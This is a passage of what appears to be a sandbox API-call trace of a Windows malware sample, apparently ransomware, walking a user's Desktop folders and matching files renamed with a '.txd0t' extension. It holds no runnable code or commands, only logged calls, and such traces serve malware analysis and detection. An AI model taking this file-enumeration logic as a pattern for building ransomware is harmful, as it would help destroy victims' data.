ftCreationTime.dwLowDateTime=0x2df6f500, ftCreationTime.dwHighDateTime=0x1d5e6eb, ftLastAccessTime.dwLowDateTime=0xe2b8a110, ftLastAccessTime.dwHighDateTime=0x1d5e96f, ftLastWriteTime.dwLowDateTime=0x510d01cb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1178d, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="9JP3XV6aItTN8Fsv.gif.txd0t", cAlternateFileName="9JP3XV~1.TXD")) returned 1 [0090.056] StrCmpW (psz1="9JP3XV6aItTN8Fsv.gif.txd0t", psz2=".") returned 1 [0090.056] StrCmpW (psz1="9JP3XV6aItTN8Fsv.gif.txd0t", psz2="..") returned 1 [0090.056] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0090.056] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0090.056] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="9JP3XV6aItTN8Fsv.gif.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif.txd0t" [0090.056] PathFindExtensionW (pszPath="9JP3XV6aItTN8Fsv.gif.txd0t") returned=".txd0t" [0090.056] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.056] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e374e70, ftCreationTime.dwHighDateTime=0x1d5e95f, ftLastAccessTime.dwLowDateTime=0x551e57d0, ftLastAccessTime.dwHighDateTime=0x1d5e0fc, ftLastWriteTime.dwLowDateTime=0x510f63bc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xd697, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="aNP_CKGono8FHP.bmp.txd0t", cAlternateFileName="ANP_CK~1.TXD")) returned 1 [0090.056] StrCmpW (psz1="aNP_CKGono8FHP.bmp.txd0t", psz2=".") returned 1 [0090.056] StrCmpW (psz1="aNP_CKGono8FHP.bmp.txd0t", psz2="..") returned 1 [0090.057] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0090.057] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0090.057] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="aNP_CKGono8FHP.bmp.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp.txd0t" [0090.057] PathFindExtensionW (pszPath="aNP_CKGono8FHP.bmp.txd0t") returned=".txd0t" [0090.057] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.057] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59d84430, ftCreationTime.dwHighDateTime=0x1d5ec72, ftLastAccessTime.dwLowDateTime=0x6b71ab60, ftLastAccessTime.dwHighDateTime=0x1d5edb6, ftLastWriteTime.dwLowDateTime=0x510f63bc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x3398, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Eiu0lN-XaE.docx.txd0t", cAlternateFileName="EIU0LN~1.TXD")) returned 1 [0090.057] StrCmpW (psz1="Eiu0lN-XaE.docx.txd0t", psz2=".") returned 1 [0090.057] StrCmpW (psz1="Eiu0lN-XaE.docx.txd0t", psz2="..") returned 1 [0090.057] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0090.057] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0090.057] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="Eiu0lN-XaE.docx.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx.txd0t" [0090.057] PathFindExtensionW (pszPath="Eiu0lN-XaE.docx.txd0t") returned=".txd0t" [0090.057] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.057] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x210b79b0, ftCreationTime.dwHighDateTime=0x1d5e3df, ftLastAccessTime.dwLowDateTime=0xcdbaa770, ftLastAccessTime.dwHighDateTime=0x1d5e9b2, ftLastWriteTime.dwLowDateTime=0x5111c5b5, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x15427, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="I0Kapz95f.avi.txd0t", cAlternateFileName="I0KAPZ~1.TXD")) returned 1 [0090.057] StrCmpW (psz1="I0Kapz95f.avi.txd0t", psz2=".") returned 1 [0090.057] StrCmpW (psz1="I0Kapz95f.avi.txd0t", psz2="..") returned 1 [0090.057] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0090.057] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0090.057] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="I0Kapz95f.avi.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi.txd0t" [0090.057] PathFindExtensionW (pszPath="I0Kapz95f.avi.txd0t") returned=".txd0t" [0090.057] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.057] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27f63220, ftCreationTime.dwHighDateTime=0x1d5ea5a, ftLastAccessTime.dwLowDateTime=0x961c3bd0, ftLastAccessTime.dwHighDateTime=0x1d5edf9, ftLastWriteTime.dwLowDateTime=0x5114291c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9158, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="OCsemDUOtc.swf.txd0t", cAlternateFileName="OCSEMD~1.TXD")) returned 1 [0090.057] StrCmpW (psz1="OCsemDUOtc.swf.txd0t", psz2=".") returned 1 [0090.057] StrCmpW (psz1="OCsemDUOtc.swf.txd0t", psz2="..") returned 1 [0090.057] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0090.057] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0090.057] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="OCsemDUOtc.swf.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf.txd0t" [0090.057] PathFindExtensionW (pszPath="OCsemDUOtc.swf.txd0t") returned=".txd0t" [0090.057] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.057] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8344ae60, ftCreationTime.dwHighDateTime=0x1d5e98b, ftLastAccessTime.dwLowDateTime=0x5773cb70, ftLastAccessTime.dwHighDateTime=0x1d5e84d, ftLastWriteTime.dwLowDateTime=0x5114291c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x218e, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="R1PzCjuzfThXdK9.ppt.txd0t", cAlternateFileName="R1PZCJ~1.TXD")) returned 1 [0090.057] StrCmpW (psz1="R1PzCjuzfThXdK9.ppt.txd0t", psz2=".") returned 1 [0090.057] StrCmpW (psz1="R1PzCjuzfThXdK9.ppt.txd0t", psz2="..") returned 1 [0090.057] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0090.057] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0090.058] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="R1PzCjuzfThXdK9.ppt.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt.txd0t" [0090.058] PathFindExtensionW (pszPath="R1PzCjuzfThXdK9.ppt.txd0t") returned=".txd0t" [0090.058] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.058] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6dee5590, ftCreationTime.dwHighDateTime=0x1d5ea10, ftLastAccessTime.dwLowDateTime=0x50bf210, ftLastAccessTime.dwHighDateTime=0x1d5e43b, ftLastWriteTime.dwLowDateTime=0x51168ac9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9d2d, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Rud6mibY589Ee3.mkv.txd0t", cAlternateFileName="RUD6MI~1.TXD")) returned 1 [0090.058] StrCmpW (psz1="Rud6mibY589Ee3.mkv.txd0t", psz2=".") returned 1 [0090.058] StrCmpW (psz1="Rud6mibY589Ee3.mkv.txd0t", psz2="..") returned 1 [0090.058] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0090.058] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0090.058] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="Rud6mibY589Ee3.mkv.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv.txd0t" [0090.058] PathFindExtensionW (pszPath="Rud6mibY589Ee3.mkv.txd0t") returned=".txd0t" [0090.058] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.058] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc974c90, ftCreationTime.dwHighDateTime=0x1d5e782, ftLastAccessTime.dwLowDateTime=0xf811d50, ftLastAccessTime.dwHighDateTime=0x1d5ea54, ftLastWriteTime.dwLowDateTime=0x51168ac9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9345, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="X24_B.gif.txd0t", cAlternateFileName="X24_BG~1.TXD")) returned 1 [0090.058] StrCmpW (psz1="X24_B.gif.txd0t", psz2=".") returned 1 [0090.058] StrCmpW (psz1="X24_B.gif.txd0t", psz2="..") returned 1 [0090.058] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0090.058] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0090.058] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="X24_B.gif.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif.txd0t" [0090.058] PathFindExtensionW (pszPath="X24_B.gif.txd0t") returned=".txd0t" [0090.058] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.058] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7352e6f0, ftCreationTime.dwHighDateTime=0x1d5e4c9, ftLastAccessTime.dwLowDateTime=0x81b04700, ftLastAccessTime.dwHighDateTime=0x1d5e48e, ftLastWriteTime.dwLowDateTime=0x5118ee47, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xaaf1, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="xs8aVnsK9NnWwoql.png.txd0t", cAlternateFileName="XS8AVN~1.TXD")) returned 1 [0090.058] StrCmpW (psz1="xs8aVnsK9NnWwoql.png.txd0t", psz2=".") returned 1 [0090.058] StrCmpW (psz1="xs8aVnsK9NnWwoql.png.txd0t", psz2="..") returned 1 [0090.058] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0090.058] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0090.058] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="xs8aVnsK9NnWwoql.png.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png.txd0t" [0090.058] PathFindExtensionW (pszPath="xs8aVnsK9NnWwoql.png.txd0t") returned=".txd0t" [0090.058] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.058] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcbf2e40, ftCreationTime.dwHighDateTime=0x1d5e4e8, ftLastAccessTime.dwLowDateTime=0x7729f3c0, ftLastAccessTime.dwHighDateTime=0x1d5e1a1, ftLastWriteTime.dwLowDateTime=0x5118ee47, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x5ec8, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="yGjZ.rtf.txd0t", cAlternateFileName="YGJZRT~1.TXD")) returned 1 [0090.058] StrCmpW (psz1="yGjZ.rtf.txd0t", psz2=".") returned 1 [0090.058] StrCmpW (psz1="yGjZ.rtf.txd0t", psz2="..") returned 1 [0090.058] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0090.058] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0090.058] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="yGjZ.rtf.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf.txd0t" [0090.059] PathFindExtensionW (pszPath="yGjZ.rtf.txd0t") returned=".txd0t" [0090.059] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.059] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73a938d0, ftCreationTime.dwHighDateTime=0x1d5f044, ftLastAccessTime.dwLowDateTime=0xab35d760, ftLastAccessTime.dwHighDateTime=0x1d5e37c, ftLastWriteTime.dwLowDateTime=0x511b4efb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1484c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="yKYlr_viA.odt.txd0t", cAlternateFileName="YKYLR_~1.TXD")) returned 1 [0090.059] StrCmpW (psz1="yKYlr_viA.odt.txd0t", psz2=".") returned 1 [0090.059] StrCmpW (psz1="yKYlr_viA.odt.txd0t", psz2="..") returned 1 [0090.059] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0090.059] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0090.059] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="yKYlr_viA.odt.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt.txd0t" [0090.059] PathFindExtensionW (pszPath="yKYlr_viA.odt.txd0t") returned=".txd0t" [0090.059] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.059] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73a938d0, ftCreationTime.dwHighDateTime=0x1d5f044, ftLastAccessTime.dwLowDateTime=0xab35d760, ftLastAccessTime.dwHighDateTime=0x1d5e37c, ftLastWriteTime.dwLowDateTime=0x511b4efb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1484c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="yKYlr_viA.odt.txd0t", cAlternateFileName="YKYLR_~1.TXD")) returned 0 [0090.059] FindClose (in: hFindFile=0xec20f0 | out: hFindFile=0xec20f0) returned 1 [0090.059] GetProcessHeap () returned 0xe30000 [0090.059] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec7a58 | out: hHeap=0xe30000) returned 1 [0090.059] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c24360, ftCreationTime.dwHighDateTime=0x1d5eda4, ftLastAccessTime.dwLowDateTime=0xd1e421a0, ftLastAccessTime.dwHighDateTime=0x1d5e5e8, ftLastWriteTime.dwLowDateTime=0x511db202, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x12d6c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="tCY_wfmFOaMzCGVNZFEd.m4a.txd0t", cAlternateFileName="TCY_WF~1.TXD")) returned 1 [0090.059] StrCmpW (psz1="tCY_wfmFOaMzCGVNZFEd.m4a.txd0t", psz2=".") returned 1 [0090.059] StrCmpW (psz1="tCY_wfmFOaMzCGVNZFEd.m4a.txd0t", psz2="..") returned 1 [0090.059] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.059] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.059] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="tCY_wfmFOaMzCGVNZFEd.m4a.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a.txd0t" [0090.059] PathFindExtensionW (pszPath="tCY_wfmFOaMzCGVNZFEd.m4a.txd0t") returned=".txd0t" [0090.059] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.059] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa00db610, ftCreationTime.dwHighDateTime=0x1d5f00a, ftLastAccessTime.dwLowDateTime=0x1f58d860, ftLastAccessTime.dwHighDateTime=0x1d5e5e7, ftLastWriteTime.dwLowDateTime=0x511db202, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf698, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="TLtL7FqQ6HKzRKYgMVx.mp3.txd0t", cAlternateFileName="TLTL7F~1.TXD")) returned 1 [0090.059] StrCmpW (psz1="TLtL7FqQ6HKzRKYgMVx.mp3.txd0t", psz2=".") returned 1 [0090.059] StrCmpW (psz1="TLtL7FqQ6HKzRKYgMVx.mp3.txd0t", psz2="..") returned 1 [0090.059] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.059] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.059] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="TLtL7FqQ6HKzRKYgMVx.mp3.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3.txd0t" [0090.059] PathFindExtensionW (pszPath="TLtL7FqQ6HKzRKYgMVx.mp3.txd0t") returned=".txd0t" [0090.059] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.059] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x506c6ac0, ftCreationTime.dwHighDateTime=0x1d5ea0b, ftLastAccessTime.dwLowDateTime=0x59cb56b0, ftLastAccessTime.dwHighDateTime=0x1d5e210, ftLastWriteTime.dwLowDateTime=0x5120bf81, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9cac, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="tpWq0W7bdVW50sRvURB.ods.txd0t", cAlternateFileName="TPWQ0W~1.TXD")) returned 1 [0090.060] StrCmpW (psz1="tpWq0W7bdVW50sRvURB.ods.txd0t", psz2=".") returned 1 [0090.060] StrCmpW (psz1="tpWq0W7bdVW50sRvURB.ods.txd0t", psz2="..") returned 1 [0090.060] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.060] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.060] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="tpWq0W7bdVW50sRvURB.ods.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods.txd0t" [0090.060] PathFindExtensionW (pszPath="tpWq0W7bdVW50sRvURB.ods.txd0t") returned=".txd0t" [0090.060] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.060] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27a643a0, ftCreationTime.dwHighDateTime=0x1d5ebea, ftLastAccessTime.dwLowDateTime=0xe444740, ftLastAccessTime.dwHighDateTime=0x1d5e514, ftLastWriteTime.dwLowDateTime=0x51227672, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x17820, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="VCbe_Sa0NEidgDcyfgFz.flv.txd0t", cAlternateFileName="VCBE_S~1.TXD")) returned 1 [0090.060] StrCmpW (psz1="VCbe_Sa0NEidgDcyfgFz.flv.txd0t", psz2=".") returned 1 [0090.060] StrCmpW (psz1="VCbe_Sa0NEidgDcyfgFz.flv.txd0t", psz2="..") returned 1 [0090.060] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.060] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.060] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="VCbe_Sa0NEidgDcyfgFz.flv.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv.txd0t" [0090.060] PathFindExtensionW 